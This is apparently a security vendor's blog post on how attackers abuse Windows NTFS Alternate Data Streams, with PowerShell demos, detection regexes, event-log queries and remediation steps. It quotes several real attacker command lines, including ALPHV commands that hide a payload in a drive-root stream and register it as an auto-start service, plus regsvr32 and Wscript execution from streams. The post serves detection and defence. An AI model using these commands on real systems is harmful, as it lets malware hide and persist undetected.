
Living Off the Land

How Attackers Exploit Windows Alternate Data Streams

Imagine a thief who hides stolen goods in a secret compartment - one that even security scanners can’t detect.

That is exactly how attackers use Windows Alternate Data Streams (ADS): like a Russian doll, a malicious file is nested inside a seemingly innocent one so that it evades detection. The technique lets attackers hide malware, establish persistence, and exfiltrate data, all while slipping past traditional security tools.

Let’s dive into how ADS works, how attackers exploit it, and how you can defend against it.

 

What Are Windows NTFS Alternate Data Streams?

Alternate Data Streams (ADS) are a built-in "feature" of the Microsoft NT File System (NTFS), introduced in Windows NT 3.1 (1993) for compatibility with Apple's Hierarchical File System (HFS). ADS lets a user store a file or metadata in a hidden, named data stream attached to another file.
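The following added example (not code from the original post) shows what an alternate data stream looks like from the defender's side on an NTFS volume: a named stream is written onto an ordinary text file, the file's reported size does not change, and only a stream-aware listing reveals it. The temp folder, file name and stream name are constructed for the demo.

```powershell
# Added example (not from the original post): shows how an NTFS alternate data
# stream behaves. Requires Windows with an NTFS volume. The folder, file and
# stream names below are constructed for the demo.

$dir  = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
$file = Join-Path $dir 'report.txt'

# 1. Ordinary file content lives in the unnamed default stream (shown as ":$DATA").
Set-Content -Path $file -Value 'quarterly numbers'

# 2. Write a second, named stream onto the same file.
Set-Content -Path $file -Stream 'hidden.txt' -Value 'this text is in an alternate stream'

# 3. Explorer, a plain dir, and Get-ChildItem report only the default stream's size.
"Visible length: $((Get-Item $file).Length) bytes"

# 4. Enumerate every stream on the file; anything other than :$DATA is an ADS.
Get-Item -Path $file -Stream * | Select-Object FileName, Stream, Length

# 5. The hidden content is addressed as <file>:<stream>.
Get-Content -Path $file -Stream 'hidden.txt'

# 6. dir /r is the cmd.exe way to list streams; dir without /r never shows them.
cmd.exe /c "dir /r `"$dir`""

# Clean up the demo directory.
Remove-Item -Path $dir -Recurse -Force
```

The one stream you will see on almost every workstation is Zone.Identifier, the mark-of-the-web stream that browsers and mail clients attach to downloaded files; it is benign and is the usual false positive when you first start looking for ADS.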

 

How Do Attackers Leverage This Feature?

Threat actors use ADS for:

  • Hiding Malicious Files – Bypassing traditional file scanning tools.

  • Hidden Malware Execution – Running malicious scripts directly from ADS to evade detection.

  • Establishing Persistence – Embedding payloads within legitimate Windows processes.

  • Exfiltrating Data – Smuggling sensitive information out of networks.

 

Attackers use ADS to hide malicious files, execute hidden malware (including in-memory execution), and exfiltrate data, all with the goal of hiding artifacts (Hide Artifacts: NTFS File Attributes, T1564.004 [1]) from defenders and their tools. Cyderes recently responded to a threat that leveraged this technique: the actor abused ADS by scheduling tasks that ran a payload through a legitimate Windows binary to establish command and control (C2) and exfiltrate data via a stream inside the Windows file path.

 

Sample

cmd.exe /c start /B regsvr32.exe /s C:\Windows/System32:microsoft.log

 

Before ceasing operations, the ALPHV/BlackCat ransomware group was also observed abusing this capability, as reported by CrowdStrike in their write-up on ALPHA SPIDER (ALPHV) [2] about a year ago. The threat actor created an ADS on the C:\ drive root to establish their backdoor. By doing this, ALPHV hid itself from the command "dir /r", which normally reveals a file's data streams.

 

Sample

Powershell -command "& {(Get-Content C:\System -Raw | Set-Content C:\ -Stream 'Host Process for Windows Service')}"
sc.exe create ssh-server binPath="C:\:Host Process for Windows Service -b 1074 "REDACTED_IP" DisplayName="OpenSSH Authentication Server" start= auto error= ignore
net start ssh-server

 

While modern threat actors continue to exploit ADS for persistence and exfiltration, historical cases also demonstrate its long-standing effectiveness. One such case is APT32's abuse of ADS for registry-based persistence.

In a 2017 analysis of Ocean Buffalo (APT32), Assaf Dahan at Cybereason [3] found that the threat actor modified registry key values to establish persistence and run .txt files containing VBScript, which in turn executed PowerShell scripts. One of these registry values referenced a hidden data stream named "log.txt" attached to another file (Dahan, 2017).

 

Sample

Wscript /Nologo /E:VBScript C:\ProgramData\Activator\scheduler\activator.ps1:log.txt

 


How Can You Defend Against ADS Abuse?

A key indicator of an ADS is a colon ":" appearing in a file path or file name after the drive letter's own colon (e.g. C:\Windows\System32\image.jpg:file.txt).

In PowerShell, an obvious sign is the "-Stream" parameter, as seen in the ALPHV ransomware scenario.

Data streams can be executed in many ways, so it is important to watch for the colon that should not be there. One way to check for data streams is to use PowerShell or Sysinternals (streams.exe) to periodically scan for ADS usage; the scan can be automated for continuous monitoring.
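The two checks described above, as an added example that is not part of the original post: a function that flags text containing the "colon that shouldn't be there" (or a PowerShell -Stream parameter), exercised against command lines as they would appear in process-creation telemetry, and a function that walks a directory tree and lists every named stream the way a periodic scan would. The function names are this example's own; the sample command lines are constructed for the demo, three of them being the attacker commands quoted earlier in the post.

```powershell
# Added example (not from the original post): hunting helpers for ADS abuse.
# Test-AdsPath and Find-AlternateDataStreams are names chosen for this demo.

function Test-AdsPath {
    param([Parameter(Mandatory)][string]$Text)
    # <drive>:<separator><path without spaces or colons>:<stream name>.
    # Forward slashes are accepted (the regsvr32 sample uses one), and "C:\:name"
    # (a stream on the drive root, as in the ALPHV sample) matches because the
    # path part may be empty. Paths containing spaces are a known blind spot.
    $adsPath    = '(?i)\b[a-z]:[\\/][^\s:"]*:[^\s\\/:"]+'
    # PowerShell's -Stream parameter on Get-/Set-/Add-Content, Get-Item, Remove-Item.
    $streamFlag = '(?i)(^|\s)-Stream(\s|$)'
    return ($Text -match $adsPath) -or ($Text -match $streamFlag)
}

function Find-AlternateDataStreams {
    param(
        [Parameter(Mandatory)][string]$Path,
        # Zone.Identifier is the mark-of-the-web stream added to downloads; hidden by default.
        [switch]$IncludeZoneIdentifier
    )
    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object { Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue } |
        Where-Object { $_.Stream -ne ':$DATA' } |
        Where-Object { $IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier' } |
        Select-Object FileName, Stream, Length
}

# --- demo 1: command lines as they would appear in 4688 / EDR telemetry ---
$samples = @(
    'cmd.exe /c start /B regsvr32.exe /s C:\Windows/System32:microsoft.log',
    'Powershell -command "& {(Get-Content C:\System -Raw | Set-Content C:\ -Stream ''Host Process for Windows Service'')}"',
    'sc.exe create ssh-server binPath="C:\:Host Process for Windows Service -b 1074 REDACTED_IP"',
    'Wscript /Nologo /E:VBScript C:\ProgramData\Activator\scheduler\activator.ps1:log.txt',
    'C:\Windows\System32\svchost.exe -k netsvcs -p',   # constructed benign line
    'notepad.exe C:\Users\alice\notes.txt'              # constructed benign line
)
foreach ($s in $samples) { '{0,-5} {1}' -f (Test-AdsPath $s), $s }

# --- demo 2: on-disk scan of a directory tree (Zone.Identifier suppressed) ---
Find-AlternateDataStreams -Path $env:ProgramData | Format-Table -AutoSize
```

Expect the first four sample lines to report True and the two constructed benign lines False; the second line is caught by the -Stream check rather than the path pattern, because the ALPHV command names the stream through the parameter rather than with a colon. Note the /E:VBScript switch in the Wscript line is not matched, since the pattern requires a path separator right after the colon; that is deliberate, because drive-style "X:" tokens without a separator are rarely ADS references. Scheduling the disk scan (for example through a scheduled task writing to a log your SIEM ingests) turns it into the continuous monitoring the post recommends.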

MITRE ATT&CK's T1564.004 (Hide Artifacts: NTFS File Attributes) [1] provides an excellent baseline of detection recommendations for this technique. However, organizations need a multi-layered approach to catch these threats effectively.

 

Recommended Audit Logging for ADS Detection

  • EDR Telemetry – Comprehensive system monitoring.

  • Windows Event Logs:

    • 4104 – PowerShell script block logging (ADS-based execution).

    • 4688 – Process creation (Detect execution from ADS; ensure command-line logging is enabled).

    • 7045 – New Windows service installed (Persistence via ADS).

    • 4656 – File access attempt (Detect ADS modifications).

    • 4660 – File deletion (ADS cleanup activity).

    • 4663 – File access success (Detect ADS modifications).

    • 4698 – Scheduled task created (Persistence via ADS).

    • 4699 – Scheduled task deleted (Indicator removal).

    • 4702 – Scheduled task updated (Persistence via ADS).
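As an added example (not part of the original post), here is how the two highest-value sources in the list above, 4688 process creation and 4104 script block logging, can be queried and filtered for the colon-after-drive indicator. It assumes the Security log is auditing process creation with "Include command line in process creation events" enabled, that PowerShell script block logging is on, and that it runs from an elevated prompt; the function names are this example's own.

```powershell
# Added example (not from the original post): query Windows event logs for
# ADS indicators. Assumes 4688 with command-line logging and 4104 script block
# logging are enabled. Get-AdsProcessEvents / Get-AdsScriptBlockEvents are names
# chosen for this demo.

# Same indicator as the post: a colon after the drive designator.
$adsPath    = '(?i)\b[a-z]:[\\/][^\s:"]*:[^\s\\/:"]+'
$streamFlag = '(?i)(^|\s)-Stream(\s|$)'

function Get-AdsProcessEvents {
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Pull the named EventData fields out of the event XML.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                User        = $data['SubjectUserName']
                Parent      = $data['ParentProcessName']
                Process     = $data['NewProcessName']
                CommandLine = $data['CommandLine']
            }
        } |
        # The process image itself being an ADS path (C:\path\file:stream) is covered
        # by the NewProcessName check; ADS arguments by the CommandLine check.
        Where-Object { $_.Process -match $adsPath -or $_.CommandLine -match $adsPath }
}

function Get-AdsScriptBlockEvents {
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Properties[2] of a 4104 event is the ScriptBlockText field.
            [pscustomobject]@{
                Time   = $_.TimeCreated
                Script = [string]$_.Properties[2].Value
            }
        } |
        Where-Object { $_.Script -match $adsPath -or $_.Script -match $streamFlag }
}

Get-AdsProcessEvents      | Format-Table Time, User, Process, CommandLine -AutoSize -Wrap
Get-AdsScriptBlockEvents  | Format-Table Time, Script -AutoSize -Wrap
```

Two caveats on the list above that this query does not change: 4688 carries no command line unless the "Include command line in process creation events" policy is set, and 4656/4663 are generated only for objects that have an audit SACL configured, so file-access auditing of ADS writes needs SACLs on the directories you care about (or an EDR that records file stream writes directly).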

 

How Cyderes Helps Defend Against ADS Attacks

Most security tools struggle with detecting ADS-based attacks because traditional endpoint security solutions don’t always scan data streams. That’s why Cyderes takes a threat-informed defense approach, combining:

  • SIEM & EDR Integration – SIEM analytics complement endpoint detection gaps.

  • Behavioral Analytics – Spotting unusual file access and execution patterns.

  • Custom Detections – Tailored alerts for ADS-related anomalies.

  • Threat Hunting – Identifying stealthy attacker behaviors in real time.

 

In a real-world scenario, while an EDR might catch a suspicious registry key modification, it may not detect an ADS-scheduled task. Our approach ensures layered visibility across both.

 

Remediation

If you notice unusual outbound connections from atypical binaries, hidden files with ADS characteristics, or unexpected registry modifications, take immediate action:

  • Isolate the Affected System – Prevent lateral movement.

  • Investigate File and Process Anomalies – Use forensic tools to analyze ADS activity.

  • Remove Malicious Streams – Use PowerShell to inspect hidden streams (Get-Item -Path C:\file.txt -Stream *) and then delete the malicious stream by name (Remove-Item -Path C:\file.txt -Stream <name>), leaving the host file intact.

  • Engage Cyderes for Expert Incident Response – Call 855-404-TECH (8324) for rapid assistance.
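The investigate-and-remove steps above, carried through end to end as an added example that is not part of the original post: enumerate a suspect file's streams, preserve each alternate stream's bytes and hash as evidence before touching it, remove only the named stream, and verify that the host file and its visible content survive. The suspect file, stream name and evidence folder are constructed placeholders that the script creates itself so it runs on any NTFS volume.

```powershell
# Added example (not from the original post): inspect, preserve, then remove an
# alternate data stream while leaving the host file intact. The suspect file,
# stream name and evidence folder are constructed placeholders created here.

$suspect  = Join-Path $env:TEMP 'suspect.txt'
$evidence = Join-Path $env:TEMP 'ads-evidence'
New-Item -ItemType Directory -Path $evidence -Force | Out-Null
Set-Content -Path $suspect -Value 'legitimate content'
Set-Content -Path $suspect -Stream 'payload.log' -Value 'constructed stand-in for hidden content'

# 1. Enumerate: every stream except the default :$DATA is an alternate stream.
$streams = Get-Item -LiteralPath $suspect -Stream * | Where-Object { $_.Stream -ne ':$DATA' }
$streams | Select-Object FileName, Stream, Length

# 2. Preserve the bytes and a SHA-256 of each stream before touching it. The .NET
#    file APIs accept the <file>:<stream> form, so this works on Windows
#    PowerShell 5.1 and PowerShell 7 alike.
foreach ($s in $streams) {
    $safeName = $s.Stream -replace '[^\w.-]', '_'
    $out      = Join-Path $evidence ('{0}_{1}.bin' -f (Split-Path $suspect -Leaf), $safeName)
    [IO.File]::WriteAllBytes($out, [IO.File]::ReadAllBytes("${suspect}:$($s.Stream)"))
    '{0}  SHA256 {1}' -f $out, (Get-FileHash -LiteralPath $out -Algorithm SHA256).Hash
}

# 3. Remove only the named stream; the file and its default content remain.
foreach ($s in $streams) { Remove-Item -LiteralPath $suspect -Stream $s.Stream }

# 4. Verify: only :$DATA should be listed now, and the visible content is unchanged.
Get-Item -LiteralPath $suspect -Stream * | Select-Object Stream, Length
Get-Content -LiteralPath $suspect
```

Removing the stream rather than deleting the whole file matters when the host is a legitimate system or application file; the evidence copy and hash let you hand the hidden content to malware analysis and correlate it with the scheduled-task, service, or registry persistence that referenced it.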

 

Final Thoughts: Stay Ahead of Stealthy Threats

Attackers will always find new ways to abuse legitimate system features for malicious purposes. Windows Alternate Data Streams remain a powerful tool for hiding threats, but with the right strategy, defenders can expose and eliminate them.

At Cyderes, we help organizations detect, respond to, and prevent sophisticated cyber threats like ADS abuse. Let’s work together to keep your environment secure. Contact us today to learn how we can enhance your security posture.

 


Contributors

Jonathan Waknin
Director, Threat Management

Ruben Huerta
Principal Security Analyst

 

References

[1] MITRE ATT&CK, Hide Artifacts: NTFS File Attributes (T1564.004). https://attack.mitre.org/techniques/T1564/004/

[2] CrowdStrike, Anatomy of ALPHA SPIDER ransomware (blog). https://www.crowdstrike.com/en-us/blog/anatomy-of-alpha-spider-ransomware/

[3] A. Dahan, Cybereason Labs, Operation Cobalt Kitty, Part 1 (2017). https://www.cybereason.com/hubfs/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty-Part1.pdf

 

